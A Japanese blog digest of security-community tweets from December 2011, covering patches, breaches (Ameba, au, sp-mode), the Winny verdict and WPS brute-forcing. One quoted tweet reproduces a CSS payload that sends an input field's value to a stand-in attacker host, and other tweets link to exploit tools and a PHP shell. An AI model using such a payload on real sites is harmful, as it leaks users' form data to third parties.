スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

12月29~30日のtwitterセキュリティクラスタ

休み中ですが貯まったので放出。

昨日緊急アップデートがリリースされていましたが、かなり大変な脆弱性も含まれているようです。管理者の人は休日出勤お疲れ様です。
JSECTEAM:セキュリティアドバイザリ 2659883 の問題を解決するセキュリティ更新プログラム MS11-100 を定例外で公開しました。詳しくは MS11-100 のセキュリティ情報をご覧ください。http://bit.ly/vFEIRN#JSECTEAM

MasafumiNegishi:本日Microsoftから定例外の緊急パッチがリリースされています。28C3で公開されたハッシュ衝突によるDoSの他に、さらに深刻な権限昇格の脆弱性に対応したものようです。.NET Frameworkの全バージョン、全OSが対象みたい。

JSECTEAM:セキュリティ アドバイザリ (2659883) を公開し、マイクロソフトが一般に公表された ASP.NET の脆弱性を調査中であることをお知らせしました。 http://bit.ly/soj078 #JSECTEAM

JSECTEAM:2011 年 12 月 (定例外) の事前通知を公開しました。2011 年 12 月 30 日にセキュリティ アドバイザリ 2659883 の問題を解決する 1 件の緊急セキュリティ情報を定例外で公開する予定です。http://bit.ly/ruUzp4#JSECTEAM


PayPalはたまに使うので心配ですが、他の理由ではないかと…
maneta778:やばいpaypalでカード情報漏れてる。クレジットカード2枚登録してるんだがそのうちの一枚が先月不正使用されてカード会社の方で気づいて止めてくれた。もう一枚登録してあったんで気になってたんだが昨日使用されたらしくこちらもカード会社の方が気づいて止めてくれた。

maneta778:なぜpaypalと言い切ってしまうかというと 1. 1枚目に使用されたカードはここ数ヶ月paypal以外では成田の免税ショップでしか使用していない。 2. 2枚目に使用されたカードは別のネットモールで作ったカードでJCBなので基本海外では大手ホテル以外では使ってない。

maneta778:3.普段使用しているメインカードはこれら2枚とは別のカード。 4.今回不正使用された2枚を同時に登録してあるのはpaypalのみ。amazon等では別のカードを使用している。 5.航空機等の支払いはこれまた別のカードを使用している。今回不正使用された2枚を使ったことはない。


休みでついヒマで普段見ないようなメール読んじゃうわけですね。
kohisuki:年末の掻き入れ時なのか、スパム業者も世界中のあっちこっちから迷惑メールを送っているみたいだなぁ♪ 年末年始を楽しく過ごす為にも、1.添付ファイルを開かない、2.HTMLメールは見ない、等々を実践して、自分を守って下さいね♪ #spam #spam_mail #security


その他気になったことはこのあたり。
ockeghem:日記書いた / Rubyの対象バージョンを追記、mod_securityが対策として有効であることを確認しました #hashdos / “徳丸浩の日記: Webアプリケーションに対する広範なDoS攻撃手法(hashdos)の影響と対策” http://htn.to/PViGCu


Lawcojp:目の付け所がいい記事。アンドロイドのパーミッション濫用を、私は以前から「端末情報バブル」、判りにくいパーミッション説明文を「端末情報クレクレ詐欺」と呼んでいる。/IT時事刻々:Android OSから見たセキュリティ対策ソフトの制約


gohsuket:アメリカのセキュ業界ではBlackHat USAの直後に休暇を取るなと言われているが、CCCの直後に休暇取るのも #FAIL


HiromitsuTakagi:【spモード利用者へ注意喚起】信用できない人にテザリング接続させない。「ネットワーク通信」だけの許可要求のアプリも信用しない。 takagi-hiromitsu.jp/diary/20111229… spモードメールを盗み読まれたり、マイメニュー一覧を盗み読まれたり、無断で有料サービスに登録させられる等の危険


typex20:GSM網の脆弱性が発見され、第三者が自由に音声発信、SMS送信ができてしまうらしい。概要からはかなり深刻に見える。SIMの認証した後の処理になんかあるのかな。。 / “Security hole found in all GSM ne…” http://htn.to/2qFrcP


ockeghem:SPモードのWi-Fiパスワードを参照する画面 http://pic.twitter.com/aQJzeOYI


kaito834:2011年12月に発覚した掲示板サービスにおける個人情報のアクセス不備の問題に関する/.議論。#2073496によると、「Yahoo!グループで発生したこと」とのこと。 / “弁護士が被害者女性や裁判員の個人情報を誤って公開、「設定ミ…” http://htn.to/xRVW9W


typex20:あーあ。こういうのはオープンにしたら意味ないと思うのだけど。。 / “アプリケーション(.apk)の自己署名を検証する | Tech Booster” http://htn.to/fCxCi5


biac:1月14日は、 [わんくま同盟 名古屋勉強会 #20] TDD ワークショップ。当日のお題を先行して公開!! #wankuma #NagoyaAgile #tef_tokai #tddbc
スポンサーサイト

テーマ : セキュリティ
ジャンル : コンピュータ

12月27~28日のtwitterセキュリティクラスタ

たぶん今年最後の大事件でしょう。ご愁傷様です。
Hamachiya2 :『データベースサーバ上の全てのデータを人為的に削除してしまい、お客様の注文内容、残高情報等売買を行うための基礎データを消失したことで、注文の受発注全てを行うことができなくなりました』すごい http://htn.to/ooq5V9


WiFiの簡単で安全な接続のための規格WPSでPIN(暗証番号)がブルートフォースされるそうです。面倒くさがらずにWPA2で設定しましょう。
moton :無線LANのWPSのPINのブルートフォースが可能な件の注意喚起。US-CERT VU#723755- WiFi Protected Setup PIN brute force vulnerability http://bit.ly/v2qmDg 日本語版はJPCERT公開予定か

aircrackng :Flaw in WPS makes bruteforcing easier


その他気になったことはこのあたり。
kitagawa_takuji :NHKニュース 楽天 IDの不正利用相次ぐ http://nhk.jp/N3zM6HNZ


miwarin :おー。これこれ / “Amazon 欲しい物リストのセキュリティホール(詳細な住所を知る方法) - tyoro.exe” http://htn.to/C7TADh


youki10 :Javaラインタイム中のネイティブコードで書かれたモジュールに脆弱性が沢山見つかっており、Java仮想マシンによる隔離が危うくなっている、ということだと思う。信用できないサイトのアプレットを実行しなければ良いんだけど、それが見えないところで高速で起きるのが問題を難しくしている。


piyokango :『今行うべきベストプラクティスすら正しく実施されていない中で、標的型攻撃に対応しようとしても、それは無理でしょう。』 /JNSAメンバーによる2011年情報セキュリティ総括 / “NPO日本ネットワークセキュリティ協会” http://htn.to/ApMYxB


security4all :Cuckoo Sandbox 0.3 released! cuckoobox.org (demo video here http://bit.ly/vSEHSw)


akirakanaoka :SCIS 2012のWebを更新しました。 26日に公開したプログラムに修正が入りました。大きくは変わっていませんが、何件か発表キャンセルがあり、何件かがセッションを移動しています。

テーマ : セキュリティ
ジャンル : コンピュータ

12月26日のtwitterセキュリティクラスタ

もういくつか寝るとお正月ですよ。

Amebaの障害なのか不正アクセスなのかどうにもよくわからない退会騒ぎについて。malaさんの調査と原因の推測です。
bulkneets :ameba退会のやつ調べたやつね http://bit.ly/v0s8Za http://bit.ly/sEYKIT http://bit.ly/vJmoal

bulkneets :こんにちわーむ的なものならともかく、強制退会させたら拡散性ないから、短時間で5万人にXSSとかCSRFでログイン中ユーザーに罠踏ませるというのは現実的でない(ので違うと思う)。a,b,cに偏ってるのも説明できない。

bulkneets :サーバーに侵入やSQLインジェクション → もっと大規模に被害起きてもおかしくないし、情報漏洩がないと早い段階で言ってるので違うと思う。

bulkneets :なので、他人のidでも退会できちゃうようなバグがあって、(aやbで始まるidでも被害にあってない人もいるので)事前に収集したidに対して、リクエストしまくって、途中で止められた、というのを予想。

bulkneets :退会時のバッチ処理がアルファベット順で動いているか、もしくはアルファベット順で攻撃を受けて途中で止めた、のではないかなあ。


セキュリティダークナイトの人も不思議に思っている模様。
ntsuji :Amebaでの不正アクセスってIDが退会状態にされてたとのことですが、アメゴールドの不正使用や個人情報の漏えいの被害も一切発生してないことが確認されたとありますね。退会状態にされるだけの不正アクセスって目的と手法が気になりますよ。 http://amba.to/vLhhcw


そしてセキュリティダークナイトが更新されています。今年はいろいろありました。
ntsuji :セキュリティ・ダークナイト 「攻撃はまるでレーザービーム」が公開されていますよ。 - http://bit.ly/sUtIOB


セキュリティダークナイトも振り返りのように、もうそろそろみんな冬休みです。無職はいつでも休みなので、マジ、オススメですよ。
kitagawa_takuji :年末年始の注意と2012年のセキュリティ動向の予測


今頃なぜtelnetなのか謎ですが、休み明けに侵入されてるのを見つけるとかはシャレにならないので注意したいものですね。
jpcert :こんにちは、先日スキャンが増加しているというツイートをしましたが、FreeBSD と Debian より、telnetd のセキュリティアドバイザリが公開されています。ご注意下さい。^KS

jpcert :なお、Port23/TCP へのスキャンと脆弱性情報の関連については現在調査中です。追加情報などがあれば、今後もツイートなどで情報をお伝えしたいと思います。^KS


さすが人口が多いとダイナミックですね。
piyokango :『中国ネット掲示板大手・天涯社区から個人情報4000万件の流出が確認されたという。これで累計9000万件の個人情報が流出した計算となる。このままいけば、1億件もあっという間に超えそうだ。』 / “【続報】史上最大の個人情報流出事件=流…” http://htn.to/Pw3bdP


その他に気になったことはこのあたり。
geekpage :ブログ書いた:世界最大のレジストラGo Daddyが大炎上、SOPA支持表明で 昨日から書き始めたけど色々調べてたら公開が今日になってしまった


security_1topi :閲覧の制限設定以前の問題ですね。 / 裁判員裁判の個人情報、ネットに掲載 閲覧設定誤る? - http://r.sm3.jp/3vKG #1tp


z_norihiko :カスぺルスキー マルウェア月次レポート 2011年11月、日本語版が本日でました。:


scis2012 :超速報。プログラムを公開しました!


gohsuket :SOPA成立なら大規模攻撃とアノニマスが予告 RT @cybertheorist Anonymous Vows Net Shutdown If SOPA Net Censorship Bill Passes http://cybr.co/CsMm @Liberationtech


このブログもTLに合わせて冬休みの不定期更新に入りたいと思います。そして2011年を振り返ったりもしようかしら。

テーマ : セキュリティ
ジャンル : コンピュータ

12月22~25日のtwitterセキュリティクラスタ

連休ですっかり早めの冬休み気分ですが仕事がまだ残ってたりするのですね。

アメーバの会員が5万人強制退会させられたそうです。不正アクセスがあったそうですが、大本営発表だけなのでなんとも。
asahi :アメーバに不正アクセス 5万人退会状態になるトラブル http://t.asahi.com/5172

nekomata_nya :アメーバ、不正アクセスで勝手に退会にしといて、メルマガが定常運転ってのがすごいなぁ。尊敬するよ、まったく。 http://yfrog.com/ocqxbjtj

tiesak :アメーバに不正アクセス、利用者が退会状態に(RBB TODAY) - Y!ニュース

nescafegoldblen :アメーバの退会トラブルは不正アクセスが原因だった http://dlvr.it/124Xst

yutoriseizinn :アメーバに不正アクセスされて5万人が退会状態とかどうしようもねえよwwwっていうか昨日の11時から判明したのに今日の午後3時から復旧作業始めますとか言ってたんだが遅すぎね?よりによってクリスマスの日とか、謝罪文たらたら書き連ねるんだろうなぁ。明日の8時までかかるしドンマイとしか…


DoCoMoのSPモードのなぜか他人のメールが届く事故について高木せんせいが原因を推測して対応策を述べられてます。IPアドレスを識別子に使うなら1ユーザーごとに固定のIPv6アドレスを割り振ればいいじゃないですかヘ(゚∀゚ヘ)アヒャ
HiromitsuTakagi :spモードを試した。以下、初期所見。①設定のために spmode.ne.jp/setting/ に行くことになるが、この時点で既にユーザ識別されている。URLパラメタもPOSTデータもなく直にアクセスしても、cookieをクリアしOFFに設定していても識別される。

HiromitsuTakagi :②HTTPSなのでGWでヘッダに何か挿入することはできないし、ブラウザが端末識別番号を送信しているとは考えにくい。③そうすると、この時点で既に、Webサーバでユーザ識別する手段は、IPアドレスを用いるしかないのではないか。

HiromitsuTakagi :④ユーザ識別はこの図

の「パケット交換機」で電話網の信号からIPパケットが再構成される際にはIMSIか何かで可能となるが、それを他のサーバに伝えたくともIPパケットに載せる手段はない。よって、IPアドレスの登録と参照を使うことになったと。

HiromitsuTakagi :⑤iモードでは、「パケット交換機」がHTTPストリームを再構成する際にその場で直接、(IMSI等で識別しているユーザに対応する)ユーザ識別子(uid又はiモードID)を埋め込んで、他のサーバにHTTPで送信することができた。(そのためHTTPSでは使えなかったのだが。)

HiromitsuTakagi :⑥spモードはスジが悪い。目的がアプリレイヤでのend-to-endの認証済み識別であるはずなのに、下のレイヤの中継地点で認証と識別の提供をしようとしている。(もし「パケット交換機」でHTTPSを解くなら一般的なリバースプロキシと同様で変ではない。⑤のヘッダ挿入もそれに類する。)

HiromitsuTakagi :⑦正しい設計はこう。「パケット交換機」上で接続のIMSIが確認された際にセッションIDを発行して端末側アプリに(何らかのプロトコルで)返す機能を用意。アプリはそのIDをHTTPSなどアプリレイヤでend-to-endの通信に載せてサーバに送信。サーバはIDからユーザ識別子を得る。

HiromitsuTakagi :⑧auのスマホはそれ(⑦のこと)っぽいことをやっている感じに見える。(未確認)(「au one-ID設定」のとき) ⑨結局、「一般にシングルサインオンの実現方式は、ID連携方式かリバースプロキシ方式」と言われるように、どっちかしかないところ、spモードはどっちでもない斬新方式。

HiromitsuTakagi :⑨スマホから使う spmode.ne.jp/setting/ はインターネットから接続できないようにされている。このことがカスであることの証と言ってよい。これが解消されたらば(つまり、Webの隠し画面など存在しなくなったとき)、抜本的な問題解決が図られたと見てよいだろう。

HiromitsuTakagi :⑩その暁には、何らかのアプリが⑦のセッションIDを取得してWebブラウザに引き回して spmode.ne.jp/setting/ にパラメタ付きでアクセスするようになるはず。(よって、その画面はインターネットから見えていて何ら問題ない。)

HiromitsuTakagi :以上、こんなところではないかと推測。

HiromitsuTakagi :というわけで、今回の事故はメールだけではなく、あらゆるspモード関係機能に及んだ可能性あり。記事 でも、「一時停止した21項目のspモードサービスはIPアドレスを使っているので…実際に何が起きたかを確認しているところ」と言われている。

HiromitsuTakagi :図にした。先の⑥を図にしたもの。

HiromitsuTakagi :一方、先の⑤の図はこうだった。

HiromitsuTakagi :そして、先の⑦を図にするとこう。
HiromitsuTakagi :昨日の⑦ twitter.com/HiromitsuTakag… は取り消し。図で言うと websequencediagrams.com/cgi-bin/cdraw?… が取り消し。理由:テザリングを許した時点でアウト。結局、携帯電話通信のレイヤから利用者を識別してアプリレイヤで使うという発想自体がオワっとる。無理。やめるべき。


うちではいきなりマルウェア扱いされたので詳細は不明です。
PhysicalDrive0 :Exploit Pack - Happy new year! | Open source security tool 4 exploit writers and security researchers http://goo.gl/0bVtM


クラウドすげー。
SecurityTube :[Video] WPA Cracking ON EC2 GPU Instance 50000 PMKs/s

WPA Cracking ON EC2 GPU Instance 50000 PMKs/s from J0k3rr on Vimeo.


by j0k3rr


bulkneets :ローソンガジェットのXSS修正されました(報告して1日半ぐらい)


その他に気になったことはこのあたり。
mayahu32 :[バイナリ解析]マルウェアを自動で解析する仮想マシン「Zero Wine Tryouts」


MasafumiNegishi :なんとなく年末モードで今年の主要なトピックを考えてみると、(1) APTの拡大(いろいろな意味で)、(2) Hacktivismの台頭 (おもに Anonymous)、(3) CAの信頼ガタ落ち (Comodo, DigiNotarなど)、この3つかなぁ。


kitagawa_takuji :中国拠点のハッカーに企業秘密筒抜けの恐れ-出張中の社員が標的に ホテル向インターネット接続サービス iバーンのシステムを企業ネットワークへの入り口として利用し、出張中の社員を通じ企業秘密が漏れていた恐れ < 出口対策だけでは不十分な例


ntsuji :不正送金総額3億円のうちフィッシングによる犯行が約2000万円、不正プログラムによる犯行が約2億8000万。 / インターネットバンキングに係る不正アクセス禁止法違反等事件の発生状況等について[PDF] - http://bit.ly/rPud3y


ockeghem :日記書いた/タイトルのtypoを修正しました / “大垣本を読んで「バリデーションはセキュリティ対策」について検討した - ockeghem(徳丸浩)の日記” http://htn.to/oj8nfX

テーマ : セキュリティ
ジャンル : コンピュータ

12月21日のtwitterセキュリティクラスタ

おめでとうございます。来年はぜひともDEFCON CTFでの上位入賞を。
sutegoma2 :チーム sutegoma2 で 2011年度JNSA特別賞いただきました! ありがとうございます。


セキュリティのために入れたのに脆弱になる残念なパターンですね。
kitagawa_takuji :「MyJVN バージョンチェッカ」を実行するためにJREをインストール、その後、放置という例も多そう。


BINDはめんどくさいし、djbdnsはアレだし、Unboundは脆弱なのか…
mj_enterprise :DNSサーバ「Unbound」にクラッシュ脆弱性、アップデート強く推奨 http://j.mp/rDQxG0


東京ドーム○個分、が思い浮かびましたが、まだ東京ドームの方が正確なだけマシなような気がします。
ntsuji :「CIA並みの実力を持つハッカー部隊」って言われるとなんか凄そうと思う。でも。CIAがどんくらいか分からないのでやっぱりよく分からないです。/ 【速報】金正日死去 韓国、直ちにサイバー攻撃に警戒 北朝鮮のハッカー部隊はCIA並みの実力 - http://bit.ly/ujOhIy


在野… ってゲームの三国志を思い出しました。召し抱えようとして断られるとショックなんですよね。
kitagawa_takuji :この記事の会員限定の部分の図に「在野ハッカー」という用語が出てきてなんかワラタ "組織超えた「情報共有」が鍵、高まるハッカー需要 世界を襲うAPT攻撃(3) :日本経済新聞 http://s.nikkei.com/uhxZJ5"


その他に気になったことはこのあたり。
rakugodesi :防犯マニュアル「マンガで学ぶサイバー空間の落とし穴」(京都府警察・トレンドマイクロ株式会社・京都精華大学・学生防犯ボランティア「ロックモンキーズ」の協同制作)  http://ow.ly/86mDZ


kyo_ago :input[value*=“\x10”]{ background:url(“//attacker.com/?h=\x10”); } これまじ頭いい // [PPT] Tactical Exploitation using CSS http://bit.ly/sqY1kV


itmedia :[エンタープライズ]3年前に発覚した脆弱性を悪用するワームの検出が今なお最多に、トレンドマイクロ調べ http://bit.ly/tAmpix


kitagawa_takuji :中国のハッカー、米国商業会議所のコンピューターに侵入-WSJ紙 - 中国国内のハッカーが米国商業会議所のコンピューターシステムに侵入し、保存されている全てのデータにアクセスすることができたと、


vezihgth :いや、自己評価は…。映画監督や役者が「最高の映画が作れました」と言ってても観客がそう評価し納得してくれないと。 RT @HiromitsuTakagi: ですよね。私はかなりやったのですが。 RT @vezihgth 叫びを消せなかった有識者こそそもそも役立たずの諸悪の根源


internet_watch :スマホ利用者のウイルス不安が増加、無線LAN暗号化実施率は約6割~IPA調査 http://bit.ly/vSxVdo


kitagawa_takuji :標的型攻撃とスマホ効果でセキュリティソフト市場は5%成長 ~IDC Japan調査


kaito834 :「RSA SecurID Software Token for Windows」におけるDLL Hijackingの問題が修正された。CVE-2011-4141。 / “U-063: RSA SecurID Software Toke…” http://htn.to/oAz6cc


なお、週末まで大阪に滞在しますので、月曜日まで更新はたぶんお休みの予定です。あしからずご了承ください。

テーマ : セキュリティ
ジャンル : コンピュータ

12月20日のtwitterセキュリティクラスタ

Winnyを開発して逮捕された金子氏の無罪が確定しました。これで脆弱性が修正されたりするのでしょうか。
tospo_mobile :「Winny」開発者金子勇氏の無罪が確定


Lawcojp :次の記事が、今回の最高裁判決の内容に比較的詳しく触れている。「ウィニー:開発者の無罪確定へ…最高裁、検察の上告棄却 - 毎日jp(毎日新聞) 」


Lawcojp :弁護人の壇先生、心よりおめでとう。長い苦労が報われましたね。「ウィニー開発者無罪確定へ…最高裁が上告棄却」


sophizm :「【備忘Log】 Winny無罪判決を受けての知財・法律系クラスタの反応」をトゥギャりました。 http://togetter.com/li/230236


sophizm :Winny事件の推移をざっくりとまとめてみました。はてなまとめのシステムがよく分からないので、問題がありましたら対応致します。 / “Winny事件の推移 - はてなまとめ(仮)” http://htn.to/xjhgdL


そして、詳しい人たちの意見。ツールが無罪だからといって他人のソフトや動画を交換しちゃダメなのは変わりません。
lumin :Winnyの作者は無罪になったけれども、Winnyを使って著作権侵害するファイルや児童ポルノになるファイルをアップロード状態にしたら。Winnyでも ShareでもBittorrentでもCabosでも逮捕されて有罪だから。警察は今年度力入れ過ぎぐらいに逮捕しているし。高リスク。


a4lg :oO( "Winny の技術" を見てもらえばわかるとおり、通過するキー情報のうち最低でも 4% 程度が「中継可能」になる。よって、継続的に違法ファイルの排除をしないと Winny ノードを完全合法で使うのは難しい。もちろんこういうノードの場合、意図が問題視されると思うけど。 )


Hamachiya2 :Winnyの無罪を、おかしな前例を作られたくないという意味で開発者として喜ぶのはいいけど、何も考えずに「有用なツールを作っただけの包丁職人」と神格化するのはいただけない。どう見てもあれは権利侵害する目的で作られたものだし犯罪(に使う)ツールという意味ではウイルス作成と同じに思える

Hamachiya2 :本日の「お前が言うな」ツイートでした


やはりというか、何か大きいニュースがあると便乗した攻撃があるのがお約束になってきましたね。
shu_tom :New Blog post: 北朝鮮総書記死去のニュースに便乗した標的型メールを確認 (Tokyo SOC Report) http://ibm.co/sY4mnf CVE-2011-2462を悪用。"The life of King Rong II.pdf"は typo?


ゼロデイの在庫によって値段が変わったりするんですかね。
kitagawa_takuji :フランスのVUPENという企業の「 Exploits for Law Enforcement Agencies 」というサービスのブローシャがWikiLeaksによって公開されているのでこれは必見  (続

kitagawa_takuji :続)諜報機関や捜査機関の皆さん。今まで監視対象のPCにモニタ・ツールを入れるのはソーシャルや物理的アクセスが必要でしたね。当社が提供するゼロデイExploitを使えばこの手順が効率化できます。ゼロデイ情報はどこにも公開しないのでパッチが作られることもありません。というサービス


MozillaがCTFを開催するようです。Web関係の問題が多いとうれしいなあ。
piyokango :“Security/Events/CTF - MozillaWiki” http://htn.to/eCrBF6


これはひどい。
kaito834 :2011年12月20日、「spモードメールをご利用されている一部のお客様のメールアドレスが、別のメールアドレスに誤って設定されている」事象が発覚。申告件数「103件 (午後8時時点)」。 / “通信障害のお知らせ : spモードの不具…” http://htn.to/DGCppk


その他に気になったことはこのあたり。
ockeghem :とても分かりやすい解説ありがとうございます / “MS11-099 Internet Explorer 用の累積的なセキュリティ更新プログラム で修正されたXSSの話 - 葉っぱ日記” http://htn.to/Dc56WE


tentama_go :バンダイビジュアルのサイトで不正アクセス。「.ANIME」など4サイトが現在サービス停止中。これにともない「TIGER & BUNNY」HERO AWARDS 2011公式パンフレット」は販売開始を延期。個人情報流出はみられないみたい bandaivisual.co.jp/support/info/2…


cci_forensics :某国際会議でしゃべった内容の一部を書きました。 RT @IIJSECT: IIJ Security Diary: メモリフォレンジックによるマルウェア感染痕跡の調査


MasafumiNegishi :気がついたら公開されてた。SHODANの紹介記事です。Pen Testで使ってる人っているのかなぁ? “@IIJSECT: IIJ Security Diary: SHODAN検索エンジンとは何か?


ntsuji :ターゲットに何手順か踏ませないと炸裂しないなって脆弱性で攻撃するとき、ターゲットに手順書を送っちゃえば案外その通りやってくれて刺さるんじゃないかという話になったことがあります。名前は「親切なタイプの攻撃」


avwatch :JVAら、リッピングソフト収録誌発行の出版社に提供中止を要求 http://bit.ly/ukCAOV


hdconsul :「2011年度 情報セキュリティの脅威に対する意識調査」報告書を公開しました。 http://dlvr.it/11J7Nn


RC31E :「使用中のPCをバットやこぶしなどで殴った」9%--セキュリティ意識調査(Avira) | ScanNetSecurity http://bit.ly/u5eU22 @ScanNetSecurityさんから もちつけ・・・キーボードクラッシャーじゃあるまいしw


roaring_dog :ふーん→ 中国対日有害サイバー組織総覧2012 - 株式会社ネットセキュリティ総合研究所 -


matsuu :Torにリモートからシステムを乗っ取られる脆弱性。0.2.2.35へアップデート。 / “[tor-announce] Tor 0.2.2.35 is released (security patches)” http://htn.to/xBTqqF


hasegawayosuke :IE6なくなると、おもちゃ減って困る。

テーマ : セキュリティ
ジャンル : コンピュータ

12月19日のtwitterセキュリティクラスタ

もう今年もあと10日あまりですか。
jpcert :「冬期の長期休暇を控えて」を公開しました。長期休暇期間における対応をご確認ください。^YK

JSECTEAM :ブログをポストしました。「2011 年 マイクロソフトのセキュリティ公開まとめ」 http://bit.ly/t4Ve1j #JSECTEAM

eEye :2012 preview ? Enterprise Security http://bit.ly/sITTDd #security #predictions

itmedia :[エンタープライズ]国内セキュリティソフト市場規模、2015年は2357億円の見込み――IDC調べ http://bit.ly/s1Gcnc


バリデーションがセキュリティ対策か否かは本当にどうでもいいことだと思います。一言で言うと「で?」
ockeghem :バリデーションがセキュリティ対策か否かは用語の定義の問題に過ぎない。バリデーションが不要とする人などいない。何を基準にバリデーションするかが重要 / “なぜPHPアプリにセキュリティホールが多いのか?:第45回 入力バリデーションはセ…” http://htn.to/nSa8S8


引用にセンスを感じます。
kitagawa_takuji :サイバー攻撃、手口巧妙化 危機管理の「油断」突く  :日本経済新聞 http://s.nikkei.com/uf4KAX サイバー攻撃に詳しい情報セキュリティ相談センターの萩原栄幸事務局長は


総書記がお亡くなりになったみたいで、追悼DDoSとか思いましたがたぶん回線細いので大丈夫ですね。
miraicorp :北朝鮮に無事に後継者が出来れば、来年には、あの国のあのコード、KPS 9566の最新版、KPS 9566-2012ができるはず。0x246e-70までの3文字は、김정은の太文字、つまり金正恩が追加されるはず。さもなくば体制崩壊ということになるので、それはそれで一大事ですね


その他に気になったことはこのあたり。
ParvezGHH :Bypassing EMET’s EAF with custom shellcode using kernel pointer http://greyhathacker.net/?p=483


mryuhei :株式会社VOYAGE GROUP主催のオープンセミナー「ネットサービスと個人情報・プライバシー」(講師は高木浩光氏と鈴木正朝氏)に参加してきたので、ブログに軽くメモをつけました。


takesako :Network Security Forum 2012(NSF2012)1月25日(水)【パネルディスカッション】世界のセキュリティ人材育成と日本の課題 ~CTFが切り札となるか!?~


kitagawa_takuji :文科省「科学技術週間」サイト、中国語に改ざん : 社会 : YOMIURI ONLINE(読売新聞) 行事の検索画面で、「一般公開」「講演会」などのキーワードが中国語に書き換えられ、その下に特定サイトのアドレスが記されていた。


tamiyata :今回も辻さん(@ntsuji )が出演するそうです。前回のは最後だけ見ましたが「山崎邦正に似てる」以外は大絶賛でした。:国家の情報セキュリティと「Anonymous」 米「Democracy Now!」の特集をニコ生で - ライブガイド http://ow.ly/83Ayi


zusanzusan :東芝レビュー(2011年11月号):社会インフラを支える情報セキュリティ技術

テーマ : セキュリティ
ジャンル : コンピュータ

12月17~18日のtwitterセキュリティクラスタ

発売されたばかりのPS Vitaでいきなり脆弱性が見つかった?ということが話題になりました。
typex20 :早速、PS VitaのPSPエミュレーション部分の脆弱性を突かれて破られる。。 / “teck4のblog : PSPのSave Game ExploitをPS VITAで試してみた。” http://htn.to/6WpHfc

cielavenir :@typex20 いやおそらくPSPエミュの中でhelloworldできてるだけではないでしょうか。

a4lg :@cielavenir 同意します。エミュレータ内で相当マズい仮想化をやっているようならここからの拡張も有りうるかもしれませんが、現時点では PSP エミュレータ内での活動に限られるでしょう。

a4lg :oO( というか、exploit が [動いている] 時点で望みは若干少なめ。というのも、この場合 PSP エミュレータが比較的素直に CPU をエミュレートしていることを意味するからだ。 )

typex20 :@a4lg @cielavenir そう書いているつもりなのですが。。

a4lg :@typex20 ごめんなさい :( Vita の脆弱性と呼ぶのはなんか嫌だなーという気持ちで少し消極的な書き方をしてしまいましたね。

typex20 :@a4lg PS Vita上のPSPエミュレータも含めてシステムですから破られたことには変わらないでしょう。それに ARMの本格的なハードウェア仮想化対応はCortex A15からなので、Cortex A9での仮想化は最新のx86に比べると”おもちゃ”みたいなものです。。

a4lg :@typex20 まぁそれはそうです。私が言いたかったのは PSP エミュレータからのシステム攻略は難しい気がするということ。そして仮想化 (エミュレーション) はスピード的にはオモチャかもしれませんが、セキュリティ分離とはあまり関係がないこと辺りですかねぇ…。

a4lg :もちろんそれが信用できないというのは理解できる意見ですが…正直 PSP エミュレータから次々に権限昇格していくよりは、PSV ゲームやアプリの脆弱性を見つける方が何倍も現実的だと思っています。


当選者の方おめでとうございます。当選しなかった人に徳丸本を差し上げちゃうキャンペーンをやろうかと思いつきましたが…
ockeghem :日記書いた。当選者の皆様おめでとうございます #wasbook / “「徳丸本をブロガーに差し上げちゃうキャンペーン」当選者のお知らせ - ockeghem(徳丸浩)の日記” http://htn.to/TGSfZi


密かに飛び入りで参加して勉強がてら壁の花として咲き誇るのもいいかもしれません。
hebikuzure :(リマインダ)「第6回ネットワークパケットを読む会(仮)」勉強会と忘年会は本日開催です。勉強会は http://atnd.org/events/22972から 、忘年会は http://atnd.org/events/22973から参加申込ください。忘年会のみの参加も歓迎です。 #pakeana


登場というかバージョンアップですがサイトリニューアルしたみたいですね。
moton :マルウエアのリバースエンジニアリング向けLinuxが登場。REMnux: A Linux Distribution for Reverse-Engineering Malware http://zeltser.com/remnux/


年の瀬を感じさせるまとめがまたまた。そういやもうアメリカはクリスマス休暇なのですかね。
ScanNetSecurity :2011年 セキュリティニュース トップ100 http://dlvr.it/116c5m

moton :スパムは2007年程度に減少。Cisco 2011 Annual Security Report(PDF)


パスコード付けようぜ! とか、売る前にデータ消そうぜ! とか、そんな感じのiPhoneに限らないセキュリティTipsですね。
yas_matsu :Top 10 iPhone Security まあ、この手、多いね。


組織全体をLMハッシュに統一して(゚д゚)ウマー ですが、パスワード盗む側にとっても(゚д゚)ウマーなのは秘密。
kitagawa_takuji :Windows 7から古いNASにアクセスできない場合の対処方法 - @IT  NAS側で新たな認証方式に対応するのが理想だが、セキュリティ・レベルが下がってもよいなら、Windows 7側の認証レベルを下げることでも対処可能だ。


パスワード付ZIPファイルって、パスワードの強度を上げて鍵交換の方法を工夫しても破られてしまう脆弱性があったりするんですかねえ。
itmedia :[エンタープライズ]萩原栄幸が斬る! IT時事刻々:年末年始で大至急チェックしたいセキュリティ対策 http://bit.ly/uEnygn


その他に気になったことはこのあたり。
kitagawa_takuji :パスワード管理をシンプルで安全に--「Windows 8」「IE10」がとるアプローチ @cnet_japanさんから LastPassのようなパスワード・マネージャーをデフォルトで提供するということか


riubard :「au one ショッピングモール」再開--不正アクセスでセキュリティ強化


hasegawayosuke :Anti Alphanum PHP Shell | Ack Ack


ockeghem :とても参考になります。実用的な内容ですね / “co3k.org - Blog - Symfony2 の力を借りたセキュア開発 (Symfony Advent Calender 2011 JP - 18日目)” http://htn.to/SYv12q


whosaysni :PSStoreを始めようアプリがすげぇ。提供元不明アプリのインストールにチェックを入れたあと、証明書のないサイトからアプリをダウンロードさせる説明文の載った、これまた証明書のないサイトに誘導してくれます。


kitagawa_takuji :米紙、対中制裁も検討せよ サイバー攻撃に警鐘 -  中国発のサイバー攻撃について「比較的知られているにもかかわらず、対策はほとんど取られていない」と問題提起。1990年代に水面下で脅威を増した国際テロリズムと似た状況にあるとして、手遅れにな

テーマ : セキュリティ
ジャンル : コンピュータ

12月16日のtwitterセキュリティクラスタ

auのサイトがやられてしまって大変なことになっているようです。
sakumariko :auoneショッピングモールで。*不正アクセスで通販サイト停止 http://nhk.jp/N3zB6AYp04推測したパスワードなどを入力し本人になりすましてログインしたものとみており、利用者の名前や住所、電話番号、メールアドレスなどが一部、閲覧されたおそれがあるということです。

ktai_watch :[ニュース] 「au one ショッピングモール」PC版で不正アクセス、一時サービス停止 http://bit.ly/tr01no


Yahoo!やMSNなどのXSS脆弱性が売られているそうです。Yahoo!がお高いのは4つ入りだからだそう。
